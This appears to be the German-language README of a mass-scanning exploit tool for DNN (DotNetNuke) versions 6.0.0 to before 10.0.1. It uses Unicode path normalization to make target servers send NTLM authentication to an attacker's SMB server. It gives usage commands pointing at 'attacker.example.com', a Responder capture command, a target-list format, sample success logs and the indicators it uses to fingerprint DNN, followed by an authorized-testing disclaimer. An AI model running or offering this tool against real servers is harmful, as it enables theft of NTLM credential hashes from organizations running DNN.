
Dieser Exploit nutzt eine Schwachstelle in DNN (früher DotNetNuke) in den Versionen 6.0.0 bis vor 10.0.1 aus, die es Angreifern ermöglicht, NTLM-Hashes durch Angriffe auf die Unicode-Pfadnormalisierung offenzulegen.
Dieser Exploit zielt auf eine Schwachstelle in DNN (ehemals DotNetNuke) Versionen 6.0.0 bis vor 10.0.1 ab, die es Angreifern ermöglicht, NTLM-Hashes durch Unicode-Pfadnormalisierungsangriffe offenzulegen.
Der Exploit nutzt Windows/.NET-Eigenheiten und Unicode-Normalisierung aus, um den Ziel-DNN-Server dazu zu zwingen, SMB-Anfragen an einen vom Angreifer kontrollierten Server zu senden, wodurch möglicherweise NTLM-Hashes während des Authentifizierungsprozesses offengelegt werden.
pip install -r requirements.txt)python main.py targets.txt attacker.example.com
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15
targets: Datei mit einer Liste von DNN-Hosts (einer pro Zeile)smb_server: Hostname/IP des SMB-Servers zum Erfassen von NTLM-Hashes-t, --threads: Anzahl gleichzeitiger Threads (Standard: 10)--timeout: Anfrage-Timeout in Sekunden (Standard: 10)Erstellen Sie eine Textdatei mit Ziel-URLs, eine pro Zeile:
http://target1.example.com
https://target2.example.com:8080
target3.example.com
Sie können Tools wie Responder verwenden, um NTLM-Hashes zu erfassen:
responder -I eth0 -wrf
Oder verwenden Sie Burp Collaborator für Out-of-Band-Erkennung.
[2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets
[2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts
Der Exploit sucht nach den folgenden DNN-Indikatoren:
dnn_IsMobile-Cookiedotnetnuke in der Antwortdnnconnect in der AntwortDNN Platform in der AntwortDieses Tool dient nur zu Bildungs- und autorisierten Sicherheitstestzwecken. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben.